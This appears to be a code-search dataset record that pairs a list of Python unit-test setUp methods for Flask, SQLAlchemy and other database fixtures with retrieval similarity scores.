app.config['DATABASE'] == 'sqlite:///:memory:'", "def setUp(self):\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"databasename\"\n self.database_path = \"postgresql://postgres:usman@{}/{}\".format('localhost:5432', self.database_name)\n setup_db(self.app, self.database_path)\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()", "def setup(self, db: UnitTestDB) -> None:\n # Use type(self) instead of self as a workaround to @classmethod decorator (unsupported by pytest and\n # required when scope is set to \"class\" <https://github.com/pytest-dev/pytest/issues/3778>)\n type(self).dbc = db.dbc", "def setUp(self):\n super(SiteDBTest, self).setUp()\n self.mySiteDB = SiteDBJSON()", "def setUp(self):\n\n # Get the Flask test client.\n 
self.client = app.test_client()\n app.config[\"TESTING\"] = True\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n\n # Connect to the test database.\n connect_to_db(app, db_uri=\"postgresql:///testnourish\") \n\n # Create the tables and add the sample data.\n db.create_all()\n load_test_data()", "def test_dummydb_basic(self):\n db = DummyDB()", "def setUp(self):\n self.database = Mock()\n self.database.reports_overviews.find_one.return_value = dict(_id=\"id\")", "def setUp(self):\n db.drop_all() # clean up the last tests\n db.create_all() # make our sqlalchemy tables", "def setUp(self):\n super(TranscriptionsTest, self).setUp()\n mommy.make_recipe('grunt.seed', _quantity=2)", "def setUp(self):\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"trivia_test\"\n # self.database_path = \"postgres://{}/{}\".format('localhost:5432', self.database_name)\n self.database_path = \"postgres://postgres:admin@{}/{}\".format(\n 'localhost:5432', self.database_name)\n setup_db(self.app, self.database_path)\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()", "def setUp(self) -> None:\n from zero.services import things\n self.things = things\n app = mock.MagicMock(\n config={\n # 'SQLALCHEMY_DATABASE_URI': 'mysql://bob:dole@localhost/ack',\n 'SQLALCHEMY_DATABASE_URI': 'sqlite:///:memory:',\n 'SQLALCHEMY_TRACK_MODIFICATIONS': False\n }, extensions={}, root_path=''\n )\n self.things.db.init_app(app) # type: ignore\n self.things.db.app = app # type: ignore\n self.things.db.create_all() # type: ignore\n\n self.data = dict(name='The first thing', created=datetime.now())\n self.dbthing = self.things.DBThing(**self.data) # type: ignore\n self.things.db.session.add(self.dbthing) # type: ignore\n self.things.db.session.commit() # type: ignore", "def setUp(self) -> None:\n from zero.services import things\n self.things = things\n app = mock.MagicMock(\n config={\n # 'SQLALCHEMY_DATABASE_URI': 'mysql://bob:dole@localhost/ack',\n 'SQLALCHEMY_DATABASE_URI': 'sqlite:///:memory:',\n 'SQLALCHEMY_TRACK_MODIFICATIONS': False\n }, extensions={}, root_path=''\n )\n self.things.db.init_app(app) # type: ignore\n self.things.db.app = app # type: ignore\n self.things.db.create_all() # type: ignore\n\n self.data = dict(name='The first thing', created=datetime.now())\n self.dbthing = self.things.DBThing(**self.data) # type: ignore\n self.things.db.session.add(self.dbthing) # type: ignore\n self.things.db.session.commit() # type: ignore", "def setUp(self) -> None:\n from zero.services import things\n self.things = things\n app = mock.MagicMock(\n config={\n # 'SQLALCHEMY_DATABASE_URI': 'mysql://bob:dole@localhost/ack',\n 'SQLALCHEMY_DATABASE_URI': 'sqlite:///:memory:',\n 'SQLALCHEMY_TRACK_MODIFICATIONS': False\n }, extensions={}, root_path=''\n )\n things.db.init_app(app)\n things.db.app = app\n things.db.create_all()\n\n self.data = dict(name='The first thing', created=datetime.now())\n self.dbthing = self.things.DBThing(**self.data) # type: ignore\n self.things.db.session.add(self.dbthing) # type: ignore\n self.things.db.session.commit() # type: ignore", "def fixture_snp_ctx(snp_db: Manager) -> Dict[str, Manager]:\n return {\"db\": snp_db}", "def autofixDependencies(self, global_ctx):\n pass", "def setup():\n load_app()\n setup_db()", "def setUp(self):\n self.app = create_app(\"configmodule.TestingConfig\")\n self.app.testing = True\n\n self.client = 
self.app.test_client()\n\n with self.app.app_context():\n db.drop_all()\n db.create_all()", "def before_test(self, func, *args, **kwargs):\n pass", "def create_test_db(self, *args, **kw):\n self.destroy_test_db()\n self.connection.use_test_datastore = True\n self.connection.flush()", "def setUp(self):\n self.a = backend.dbconnection.DBConnect()", "def setUp(self):\n self.setUpPyfakefs()", "def setUp(self):\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"trivia\"\n self.database_path = \"postgres://{}/{}\".format('localhost:5432', self.database_name)\n self.database_path = \"postgres://{}:{}@{}/{}\".format('postgres', 'postgres', 'localhost:5432', self.database_name)\n setup_db(self.app, self.database_path)\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()", "def setup_class(cls):\n super(TestUpgradeNonVendorDependencies, cls).setup_class()\n cls.scaffold_item(\"protocol\", \"my_protocol\", skip_consistency_check=True)\n cls.scaffold_item(\"connection\", \"my_connection\", skip_consistency_check=True)\n cls.scaffold_item(\"contract\", \"my_contract\", skip_consistency_check=True)\n cls.scaffold_item(\"skill\", \"my_skill\", skip_consistency_check=True)\n cls.run_cli_command(\n \"--skip-consistency-check\",\n \"add\",\n \"skill\",\n str(cls.old_error_skill_id),\n cwd=cls._get_cwd(),\n )\n cls.run_cli_command(\n \"--skip-consistency-check\", \"upgrade\", \"--local\", cwd=cls._get_cwd()\n )", "def setUp(self):\n INFLUX_DB_NAME = 'test_device_parameters'\n EmptyDBTestCase.client.create_database(INFLUX_DB_NAME)\n EmptyDBTestCase.client.drop_database(INFLUX_DB_NAME)\n EmptyDBTestCase.client.create_database(INFLUX_DB_NAME)", "def test_dependencies(self):\n process_parent = Process.objects.filter(slug=\"test-dependency-parent\").latest()\n process_child = Process.objects.filter(slug=\"test-dependency-child\").latest()\n data_parent = Data.objects.create(\n name=\"Test parent\", contributor=self.contributor, process=process_parent\n )\n data_child1 = Data.objects.create(\n name=\"Test child\",\n contributor=self.contributor,\n process=process_child,\n input={},\n )\n data_child2 = Data.objects.create(\n name=\"Test child\",\n contributor=self.contributor,\n process=process_child,\n input={\"parent\": data_parent.pk},\n )\n data_child3 = Data.objects.create(\n name=\"Test child\",\n contributor=self.contributor,\n process=process_child,\n input={\"parent\": None},\n )\n\n data_parent.refresh_from_db()\n data_child1.refresh_from_db()\n data_child2.refresh_from_db()\n data_child3.refresh_from_db()\n\n # Check locks are created in manager.\n self.assertFalse(data_parent.access_logs.exists())\n self.assertFalse(data_child1.access_logs.exists())\n self.assertTrue(data_child2.access_logs.exists())\n self.assertFalse(data_child3.access_logs.exists())\n\n # Check that the data_parent location was locked.\n access_log = data_child2.access_logs.get()\n self.assertEqual(\n access_log.storage_location.file_storage.data.get().id, data_parent.id\n )\n # Check that the log is released.\n self.assertIsNotNone(access_log.started)\n self.assertIsNotNone(access_log.finished)\n\n # Check status.\n self.assertEqual(data_parent.status, Data.STATUS_DONE)\n self.assertEqual(data_child1.status, Data.STATUS_DONE)\n self.assertEqual(data_child2.status, Data.STATUS_DONE)\n self.assertEqual(data_child3.status, Data.STATUS_DONE)", "def setUp(self):\n self.db_fd, 
closet.app.config['DATABASE'] = tempfile.mkstemp()\n closet.app.config['TESTING'] = True\n self.app = closet.app.test_client()\n closet.init_db()", "def setUp(self):\n tested_app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'\n db.init_app(tested_app)\n with tested_app.app_context():\n db.create_all()\n db.session.commit()", "def before_run_tests(cls):\n pass", "def setUp(self):\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"Casting_Agency_test\"\n self.database_path = \"postgres://hala@{}/{}\".format('localhost:5432', self.database_name)\n setup_db(self.app, self.database_path)\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()" ]
[ "0.6346832", "0.62192637", "0.6143342", "0.59758323", "0.5957415", "0.595324", "0.595152", "0.59219795", "0.58347386", "0.578332", "0.57545054", "0.5665109", "0.5632672", "0.5599801", "0.55725056", "0.5564125", "0.55455124", "0.5536632", "0.5526659", "0.5524314", "0.5510719", "0.5491591", "0.5491591", "0.54823905", "0.5465794", "0.543087", "0.54209626", "0.53828865", "0.53786063", "0.5371017", "0.53667307", "0.53601915", "0.5358789", "0.5358121", "0.5328775", "0.53165567", "0.53134227", "0.5308953", "0.52981883", "0.5293412", "0.5291785", "0.5267685", "0.5251422", "0.52423286", "0.5220213", "0.521699", "0.52164006", "0.5204553", "0.52044415", "0.5200567", "0.5199698", "0.5187574", "0.5187574", "0.5177806", "0.5177563", "0.51705563", "0.51673084", "0.516388", "0.5162581", "0.5161071", "0.51518595", "0.51479894", "0.51435333", "0.5122203", "0.51161283", "0.51160073", "0.5112822", "0.5110093", "0.5108452", "0.5107477", "0.5105264", "0.5098151", "0.5092839", "0.50870574", "0.50869733", "0.5086808", "0.5081462", "0.5080366", "0.50793046", "0.5071497", "0.50703955", "0.5063597", "0.5061005", "0.50603634", "0.50536627", "0.50512964", "0.5048671", "0.5043866", "0.5042752", "0.50416076", "0.50408214", "0.5032529", "0.503203", "0.5025351", "0.5025092", "0.50196517", "0.50187373", "0.5017885", "0.50170445", "0.50155646", "0.50131863" ]
0.0
-1
Define the edgeR object
def __init__(self, count, group, repl, output): self._table_count = count self._groups_name = group self._replic = repl self._output = output self._message = Message() self._likelihood_column = 2 + len(group)*repl self._fdr_de_column = 4 + len(group)*repl self._likelihood = 0.95 self._fdr = 0.1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, *args):\n _snap.TNGraphEdgeI_swiginit(self, _snap.new_TNGraphEdgeI(*args))", "def __init__(self, name, edge, start_node, end_node, pipe_model,\n allow_flow_reversal,\n temperature_driven, repr_days=None):\n\n self.logger = logging.getLogger('modesto.Edge')\n self.logger.info('Initializing Edge {}'.format(name))\n\n self.repr_days = repr_days\n\n self.name = name\n self.edge = edge\n\n self.start_node = start_node\n self.end_node = end_node\n self.length = self.get_length()\n\n self.temperature_driven = temperature_driven\n\n self.pipe_model = pipe_model\n self.pipe = self.build(pipe_model,\n allow_flow_reversal) # TODO Better structure possible?", "def writeEDGE(self):\n\t\tpass", "def edge(cls, edge):\n return cls(Lnk.EDGE, int(edge))", "def main():\n e = Edge(12, 34, 5.67)\n print(e)", "def __init__(self, edgelist):\n self.edge = edgelist\n if edgelist:\n self.update_node2edge()", "def define_edge(self):\n\n self.canvas_edge = Line(\n points=[\n self.canvas_nodes[0].pos[0] + self.nodesize[0] / 2,\n self.canvas_nodes[0].pos[1] + self.nodesize[1] / 2,\n self.canvas_nodes[1].pos[0] + self.nodesize[0] / 2,\n self.canvas_nodes[1].pos[1] + self.nodesize[1] / 2\n ],\n joint='round',\n cap='round',\n width=3\n )", "def __repr__(self):\n return 'Edge(%s, %s)' % (repr(self[0]), repr(self[1]))", "def __init__(self, *args):\n _snap.TUNGraphEdgeI_swiginit(self, _snap.new_TUNGraphEdgeI(*args))", "def MakeEdge(self, *args):\n return _ShapeBuild.ShapeBuild_Edge_MakeEdge(self, *args)", "def __init__(self, outV, inV, **values):\r\n self._outV = outV\r\n self._inV = inV\r\n super(Edge, self).__init__(**values)", "def __init__(self):\n self._list: List[Edge] = list()", "def __init__(self, r,g,b):\n self.__r = r; self.__g = g; self.__b = b", "def __init__(self):\n self.edges = {} # outgoing edges with terminal symbols\n self.element = None # Elements stored at this node", "def __init__(self):\n\t\tself.edges = defaultdict(list)\n\t\tself.weights = {}", "def __init__(self):\n\t\tself.edges = defaultdict(list)\n\t\tself.weights = {}", "def edge_mapping(self):\n ...", "def edge(self, v, d):\n # method here", "def __edgeRouter(self):\r\n def getEndpoint(nodeTuple, pointList, direction, isReversedEdge):\r\n \"\"\" Gets the nearest arrow endpoint. 
Handles edge reversal \"\"\"\r\n if((direction == 'start' and not isReversedEdge)\r\n or (direction == 'end' and isReversedEdge)): \r\n endNode = nodeTuple[0]\r\n if(isReversedEdge):\r\n ix = -2\r\n iy = -1\r\n else:\r\n ix = 0\r\n iy = 1\r\n else: \r\n endNode = nodeTuple[1]\r\n if(isReversedEdge):\r\n ix = 0\r\n iy = 1\r\n else:\r\n ix = -2 \r\n iy = -1 \r\n \r\n # Is it connected to a named port!?!\r\n if(endNode.isConnectedByNamedPort(edgeObject)):\r\n handler = endNode.getConnectedByNamedPortHandler(nodeTuple[2]) \r\n return dc.coords(handler)[:2]\r\n \r\n # Not a named port...\r\n return list(endNode.getClosestConnector2Point( endNode, pointList[ix], \r\n pointList[iy])) \r\n \r\n \r\n \r\n #todo: improve method for spline arrows + add comments + optimize?\r\n print '----------------Dummy Edge Routing-----------------'\r\n for dummyEdge in NodeWrapper.ID2LayerEdgeDict.keys():\r\n \r\n dummyList = NodeWrapper.ID2LayerEdgeDict[dummyEdge]\r\n dummyNode = dummyList[0]\r\n dummyChild = dummyNode.children.keys()[0]\r\n linkFlagList = dummyNode.children[dummyChild]\r\n \r\n # Real nodes at start/end of the edge\r\n edgeSourceNode = dummyNode.parents.keys()[0]\r\n edgeSourceNode = edgeSourceNode.getASGNode().graphObject_\r\n dummyNode = dummyList[-1]\r\n edgeTargetNode = dummyNode.children.keys()[0]\r\n #print 'Dummy edge number', dummyEdge,\r\n #print dummyList[0].parents.keys()[0].getName(), edgeTargetNode.getName()\r\n edgeTargetNode = edgeTargetNode.getASGNode().graphObject_\r\n nodeTuple = [edgeSourceNode, edgeTargetNode, None]\r\n \r\n # Some edges are internally reversed to break cycles, when drawing\r\n # this must be taken into account\r\n isReversedEdge = False\r\n edgesToRoute = []\r\n for linkNode, isReversed in linkFlagList:\r\n edgesToRoute.append(linkNode)\r\n if(isReversed):\r\n isReversedEdge = True\r\n \r\n # Get all the points the edge must pass through (sorted by layer order)\r\n dummyList.sort(lambda a, b: cmp(a.getLayer(), b.getLayer()))\r\n if(isReversedEdge):\r\n dummyList.reverse()\r\n sortedDummyRouteList = []\r\n for node in dummyList:\r\n sortedDummyRouteList += node.getEdgePosition()\r\n \r\n # Set the coordinates of the edge directly \r\n # This is complicated by the fact that AToM3 treats edges as two\r\n # segments that join poorly (for spline arrows)\r\n for edgeObject in edgesToRoute: \r\n dc = edgeObject.graphObject_.dc\r\n linkObj = edgeObject.graphObject_ \r\n tag = linkObj.tag\r\n \r\n if(isReversedEdge):\r\n inPoint = dc.coords( tag + \"2ndSeg0\" )[:2]\r\n outPoint = dc.coords( tag + \"1stSeg0\" )[:2]\r\n else:\r\n inPoint = dc.coords( tag + \"1stSeg0\" )[:2]\r\n outPoint = dc.coords( tag + \"2ndSeg0\" )[:2]\r\n \r\n #print 'Dummy route', sortedDummyRouteList\r\n numPoints = len(sortedDummyRouteList) / 2\r\n # Add 2 extra control points for odd case (to make splines nice)\r\n if(numPoints % 2 == 1):\r\n if(numPoints == 1):\r\n center = sortedDummyRouteList\r\n else:\r\n start = sortedDummyRouteList[:numPoints - 1]\r\n end = sortedDummyRouteList[numPoints + 1:]\r\n center = sortedDummyRouteList[numPoints - 1:numPoints + 1]\r\n \r\n if(not isReversedEdge):\r\n newMid1 = [center[0], center[1] - 20]\r\n newMid2 = [center[0], center[1] + 20]\r\n else:\r\n newMid2 = [center[0], center[1] - 20]\r\n newMid1 = [center[0], center[1] + 20]\r\n \r\n \r\n if(numPoints == 1):\r\n sortedDummyRouteList = newMid1 + center + newMid2 \r\n else:\r\n sortedDummyRouteList = start + newMid1 + center + newMid2 + end\r\n centerIndex = numPoints - 1 + 2\r\n \r\n # Add 1 extra 
control point for even case (to make splines nice)\r\n else:\r\n start = sortedDummyRouteList[:numPoints]\r\n end = sortedDummyRouteList[numPoints:]\r\n center = [start[-2] + (end[0] - start[-2]) / 2, \r\n start[-1] + (end[1] - start[-1]) / 2]\r\n sortedDummyRouteList = start + center + end \r\n centerIndex = numPoints\r\n \r\n # Now I know where the center is... so lets move the center object\r\n # Is the edge object a hyperlink?\r\n if(len(edgeObject.in_connections_ + edgeObject.out_connections_) > 2):\r\n fromObjs = []\r\n for semObj in edgeObject.in_connections_:\r\n fromObjs.append(semObj.graphObject_)\r\n toObjs = []\r\n for semObj in edgeObject.out_connections_:\r\n toObjs.append(semObj.graphObject_)\r\n optimizerHyperLink(dc, linkObj, fromObjs, toObjs, 0, 0, 0, center )\r\n continue\r\n \r\n else:\r\n linkObj.moveTo(* center)\r\n \r\n # Go through the 2 segments in the link\r\n nodeTuple[2] = edgeObject\r\n for connTuple in linkObj.connections:\r\n itemHandler = connTuple[0]\r\n direction = connTuple[1]\r\n \r\n if( direction ): \r\n inPoint = getEndpoint(nodeTuple, sortedDummyRouteList,\r\n 'start', isReversedEdge)\r\n\r\n segCoords = inPoint + sortedDummyRouteList[:centerIndex+2]\r\n else: \r\n outPoint = getEndpoint(nodeTuple, sortedDummyRouteList,\r\n 'end', isReversedEdge) \r\n segCoords = sortedDummyRouteList[centerIndex:] + outPoint\r\n segCoords = self.__reverseCoordList(segCoords)\r\n \r\n # Applies the changed coords to the canvas\r\n dc.coords( * [itemHandler] + segCoords ) \r\n \r\n # This may change the associated link drawings: \r\n # move them to the new point \r\n if( direction ):\r\n linkObj.updateDrawingsTo(inPoint[0], inPoint[1], itemHandler, \r\n segmentNumber=1)\r\n else:\r\n linkObj.updateDrawingsTo(outPoint[0], outPoint[1], itemHandler, \r\n segmentNumber=2)", "def __init__(self):\n self.edges = defaultdict(list)\n self.weights = {}", "def __init__(self):\n self.edges = defaultdict(list)\n self.weights = {}", "def __init__(self):\n self.edges = defaultdict(list)\n self.weights = {}", "def edge(self) -> EdgeConfig:\n return self._edge", "def make_edge(self, a, b):\n try: e = self.G.new_edge(a, b)\n except: return self.G.new_edge(a,b)\n\n try: self.G.set_edge_attribute(e, \"arrow\", \"true\")\n except: return self.G.new_edge(a,b)\n\n try: self.G.set_edge_attribute(e, \"spline\", \"false\")\n except: return self.G.new_edge(a,b)\n return e", "def __init__(\n self, weights, edge_score_norm\n ):\n self.weights = weights\n self.edge_score_norm = edge_score_norm", "def edges( self ):\n raise NotImplementedError(\"edges\");", "def create(cls, outV, inV, *args, **kwargs):\r\n return super(Edge, cls).create(outV, inV, *args, **kwargs)", "def __init__(self, node_class=Node, edge_class=Edge):\n self.node_class = node_class\n self.edge_class = edge_class", "def __init__(self, startVertex, endVertex, edgeWeight):\n\n self.startVertex = startVertex\n self.endVertex = endVertex\n self.edgeWeight = edgeWeight", "def __repr__(self):\n return f\"EdgeType.{self.name}\"", "def add_edge(self, v1, v2):\n pass # TODO", "def _create_edge_ist(self) -> EdgeList:\r\n return EdgeList(self)", "def __init__(self, *args):\n _snap.TDirNetEdgeI_swiginit(self, _snap.new_TDirNetEdgeI(*args))", "def __init__(self):\n self.vertices = ((0, 0, 0),(1, 0, 0),(0, 1, 0),(0, 0, 1))\n self.edges=(0,1),(0,2),(0,3)", "def __init__(self, *args):\n _snap.TCrossNetEdgeI_swiginit(self, _snap.new_TCrossNetEdgeI(*args))", "def edge(self, edge: EdgeConfig):\n\n self._edge = edge", "def __init__(self, *args):\n 
_snap.TModeNetEdgeI_swiginit(self, _snap.new_TModeNetEdgeI(*args))", "def edges(self, e):\n self._edges = e", "def __init__(self, x0, r):\n self.x, self.r = x0, r", "def get_edge(self, from_, to):\n pass", "def __init__(self, *args):\n _snap.TNEANetEdgeI_swiginit(self, _snap.new_TNEANetEdgeI(*args))", "def __init__(self, node_a, node_b, id, edge_value=\"null\"):\n self.__node_a = node_a\n self.__node_b = node_b\n self.__edge_value = edge_value\n self.__id = id", "def __init__(self, vertices, edges, surfaces):\n #self.target = target\n #self.support = support\n self.vertices = vertices\n self.edges = edges\n self.surfaces = surfaces", "def mamajek08_logRpHK_Ro_edge():\n Ro_edge = 0.31935816876122064\n return Ro_edge", "def test_create_edge(self):\n n1, n2 = Node('a'), Node('b')\n n1 | n2\n self.assertEqual(n1.eout, [Edge(n1, n2)])\n self.assertEqual(n1.ein, [])\n self.assertEqual(n2.ein, [Edge(n1, n2)])\n self.assertEqual(n2.eout, [])", "def __init__(self):\n # Flag this instance as compiled now\n self.is_compiled = True\n \n super(HEReference, self).__init__(name='HEReference', num_nodes=0, edges=[])\n \n \n # Set the graph attributes\n self[\"mm__\"] = ['HimesisMM']\n \n self[\"name\"] = \"\"\"EReference\"\"\"\n self[\"GUID__\"] = uuid.uuid3(uuid.NAMESPACE_DNS,'EReference')\n \n # match model. We only support one match model\n self.add_node()\n self.vs[0][\"mm__\"] = \"\"\"MatchModel\"\"\"\n \n # apply model node\n self.add_node()\n self.vs[1][\"mm__\"] = \"\"\"ApplyModel\"\"\"\n \n # paired with relation between match and apply models\n self.add_node()\n self.vs[2][\"mm__\"] = \"\"\"paired_with\"\"\"\n \n \n # match class EReference() node\n self.add_node()\n\n self.vs[3][\"mm__\"] = \"\"\"EReference\"\"\" \n self.vs[3][\"attr1\"] = \"\"\"+\"\"\" \n # match_contains node for class EReference()\n self.add_node()\n self.vs[4][\"mm__\"] = \"\"\"match_contains\"\"\"\n \n \n # apply class EReference() node\n self.add_node()\n\n self.vs[5][\"mm__\"] = \"\"\"EReference\"\"\" \n self.vs[5][\"attr1\"] = \"\"\"1\"\"\"\n # apply_contains node for class EReference()\n self.add_node()\n self.vs[6][\"mm__\"] = \"\"\"apply_contains\"\"\"\n \n \n \n \n \n \n \n \n \n \n # Add the edges\n self.add_edges([\n (0,4), # matchmodel -> match_contains\n (4,3), # match_contains -> match_class EReference()\n (1,6), # applymodel -> apply_contains\n (6,5), # apply_contains -> apply_class EReference()\n (0,2), # matchmodel -> pairedwith\n (2,1) # pairedwith -> applyModel\t\t\t\t\n\t\t])\n\n # Add the attribute equations\n self[\"equations\"] = [((5,'name'),(3,'name')), ((5,'ordered'),(3,'ordered')), ((5,'unique'),(3,'unique')), ((5,'lowerBound'),(3,'lowerBound')), ((5,'upperBound'),(3,'upperBound')), ((5,'changeable'),(3,'changeable')), ((5,'volatile'),(3,'volatile')), ((5,'transient'),(3,'transient')), ((5,'defaultValueLiteral'),(3,'defaultValueLiteral')), ((5,'unsettable'),(3,'unsettable')), ((5,'derived'),(3,'derived')), ((5,'containment'),(3,'containment')), ((5,'resolveProxies'),(3,'resolveProxies')), ((5,'ApplyAttribute'),('constant','solveRef')), ]", "def __init__(self):\n\t\tself.edges = defaultdict(list)\n\t\tself.weights = {}\n\t\tself.connections = {}", "def graph(self):\n ...", "def add_edge(self, e):\n v, w = e\n self[v][w] = e\n self[w][v] = e", "def __init__(self, name):\n self.name = name\n self._edges = []", "def cell_edges(self):", "def add_edge(self, e):\n a, b = e\n self[a][b] = e\n self[b][a] = e", "def E(self, edge_type, feed=None, reverse=False):\n return super(Graph, self).E(edge_type, feed, 
reverse)", "def __init__(self, options, is_training=False):\n self.options = options\n self.is_training = is_training\n self.add_bi_directional_edges = None\n self.add_self_loop_edges = None\n self.use_reverse_edges = None", "def draw_edges(self):\n pass", "def __init__(self):\n ## Dictionary of edges, indexed by edge number\n self.edgeIndex = {}\n\n ## Dictionary of vertices, indexed by vertex number\n self.vertexIndex = {}\n\n ## Dictionary of vertices, indexed by parent\n self.parentIndex = {}\n\n ## Dictionary of vertices and edge numbers, indexed by parent\n self.parentEdgeIndex = {} \n \n ## Last edge number assigned\n self.__lastEdgeNumber = -1\n\n ## Dictionary of degree counts. Used for efficiently computing degree distribution\n self.__degreeCount = {}\n\n ## Logger instance\n self.logger = PyGelLogging().getLogger()", "def __init__(self,r1,r2):\n self.r1 = r1\n self.r2 = r2\n self.a = (r1+r2)/2", "def edges(self):\r\n return self.__generate_edges()", "def set_right_edges(self):\n for v in self:\n for e in v.edges_list:\n e.linked[0]=v\n e.linked[1]=self[self.search_index_by_coordinates(e.linked[1].coordinates)]\n for e in self.list_of_edges:\n e.linked[0]=self[self.search_index_by_coordinates(e.linked[0].coordinates)]\n e.linked[1]=self[self.search_index_by_coordinates(e.linked[1].coordinates)]", "def AddEdge(self, *args):\n return _BRepAlgo.BRepAlgo_Loop_AddEdge(self, *args)", "def __init__(self):\n self.graph = None", "def edges(self):\n return self.dovetails + self.containments + self.internals", "def edge(self, viz_edge: VizEdge) -> None:\n self._digraph.edge(viz_edge.start, viz_edge.end)", "def __init__(self, vertices, edges, faces):\n self.vertices = vertices\n self.edges = edges\n self.faces = faces", "def __init__(self, x0, y0, x1, y1, r):\n\n self._x0 = x0\n self._y0 = y0\n self._x1 = x1\n self._y1 = y1\n self._rsquared = r * r", "def addEdge(self, edge):\n Digraph.addEdge(self, edge)\n rev = Edge(edge.getDestination(), edge.getSource())\n Digraph.addEdge(self, rev)", "def __init__(self):\n raise NotImplementedError('cannot create independent arc')", "def __init__(self):\n self.graph = {}\n self.edges = 0\n self.vertices = 0", "def __init__(self, r=1, p=3):\n self.p = p\n self.r = r", "def __init__(self, graph, head_vertex, tail_vertex, weight):\n super(DirectedWeightedGraphEdge, self).__init__(\n graph, head_vertex, tail_vertex)\n self.weighted = True\n self.weight = weight", "def __init__(self, graph, head_vertex, tail_vertex):\n super(DirectedGraphEdge, self).__init__(\n graph, head_vertex, tail_vertex)\n self.directed = True", "def gen_graph(self):", "def add_edge(self, edge):\n self[edge[0]][edge[1]] = edge\n self[edge[1]][edge[0]] = edge", "def addEdge(self,x,y):\r\n self.matr[x][y] = True\r\n self.matr[y][x] = True", "def add_edge (self, src, dst, link):\n raise NotImplementedError", "def add_edge(self, a, b, label=\"\", color=\"black\", length=100, arrows=\"to\"):\n\n\t\tm = self.edgesPairs.count((a, b))\n\n\t\tif m == 0 :\n\t\t\tcolor = color\n\t\tif m == 1:\n\t\t\tcolor = \"red\"\n\t\tif m == 2:\n\t\t\tcolor = \"blue\"\n\n\t\tself.edgesPairs.append((a, b))\n\t\tself.edgesPairsId[self.edgesIdsCounter] = (a, b)\n\t\tself.edgesLabelsId[self.edgesIdsCounter] = label\n\n\t\tself.edges.append({\"id\": self.edgesIdsCounter,\n\t\t\t\t\t\t\"from\": a,\n\t\t\t\t\t\t\"to\": b,\n\t\t\t\t\t\t\"label\": label,\n\t\t\t\t\t\t\"arrows\": arrows,\n\t\t\t\t\t\t\"color\": color,\n\t\t\t\t\t\t\"length\": length\n\t\t\t\t\t\t})\n\t\tself.edgesIdsCounter += 1", "def 
build_edges(self):\n print(\"Constructing Edges.\")\n # -----------------------------------------\n # TODO: You should write this method!\n\n # Note: this method may take some time to run - it is likely to be O(N^2), and some lists have N = 10,000 words or more.\n # (I've had students decide that their program was \"broken\" and quit it before this process finished... every time,\n # not realizing that the program was working hard behind the scenes.)\n # I recommend that you keep track of the number of edges you have added, and if it is a multiple of 1000, print\n # something so that you know your program is making progress.\n n = len(self.vertices)\n\n\n\n \n # -----------------------------------------\n print(\"Done Constructing Edges.\\n------------------------------------\")", "def __init__(self, *args):\n _ShapeUpgrade.ShapeUpgrade_ShapeDivideClosedEdges_swiginit(self,_ShapeUpgrade.new_ShapeUpgrade_ShapeDivideClosedEdges(*args))", "def __call__(self, data):\n if data.edge_attr is None:\n c = torch.full(\n (data.edge_index.shape[1], 1), self.value, dtype=torch.float\n )\n data.edge_attr = c\n return data", "def edges(self):\n return self.__generate_edges()", "def edges(self):\n return self.__generate_edges()", "def edges(self):\n return self.__generate_edges()", "def edges(self):\n return self.generate_edges()", "def __init__(self, edge_attribute=None, keep_top_or_bottom='top', max_edges=50, qedge_keys=None, qnode_keys=[]): # noqa: E501\n self.openapi_types = {\n 'edge_attribute': str,\n 'keep_top_or_bottom': str,\n 'max_edges': int,\n 'qedge_keys': List[str],\n 'qnode_keys': List[str]\n }\n\n self.attribute_map = {\n 'edge_attribute': 'edge_attribute',\n 'keep_top_or_bottom': 'keep_top_or_bottom',\n 'max_edges': 'max_edges',\n 'qedge_keys': 'qedge_keys',\n 'qnode_keys': 'qnode_keys'\n }\n\n self._edge_attribute = edge_attribute\n self._keep_top_or_bottom = keep_top_or_bottom\n self._max_edges = max_edges\n self._qedge_keys = qedge_keys\n self._qnode_keys = qnode_keys", "def add_edge(self, start_node, label, end_node, properties=None, **kwargs):\r\n\t\tif properties is None:\r\n\t\t\tproperties = {}\r\n\t\tedge = Edge(self._nextid, start_node, label, end_node, properties, **kwargs)\r\n\t\tself._edges[self._nextid] = edge\r\n\t\tself._nextid += 1\r\n\t\treturn edge", "def add_edge(self, position):\n raise NotImplementedError()", "def __init__(self, graph, head_vertex, tail_vertex, weight):\n super(UnDirectedWeightedGraphEdge, self).__init__(\n graph, head_vertex, tail_vertex)\n self.weight = weight", "def __init__(self,r,x_c,y_c,z_c):\n self.r = r\n self.x_c = x_c\n self.y_c = y_c\n self.z_c = z_c", "def __init__(self,r,x_c,y_c,z_c):\n self.r = r\n self.x_c = x_c\n self.y_c = y_c\n self.z_c = z_c", "def save_edge(self, edge: Edge) -> Edge:", "def __init__(self, m,r,v):\n self.m = m\n self.r = r\n self.v = v\n self.rv = np.array([r,0,0,v])", "def __init__(self,**options):\n defaults={\"graph_name\":\"Graph\",\n \"node_names\":['n1','n2'],\n \"node_descriptions\":{'n1':\"A plain string\",\n 'n2':\"A list of strings with no \\\\n, created with string.splitlines()\"},\n \"current_node\":'n1',\n \"state\":[1,0],\n \"data\":\"This is a test string\\n it has to have multiple lines \\n and many characters 34%6\\n^\",\n \"edge_2_to_1\":edge_2_to_1,\n \"edge_1_to_2\":edge_1_to_2\n }\n self.options={}\n for key,value in defaults.iteritems():\n self.options[key]=value\n for key,value in options.iteritems():\n self.options[key]=value\n 
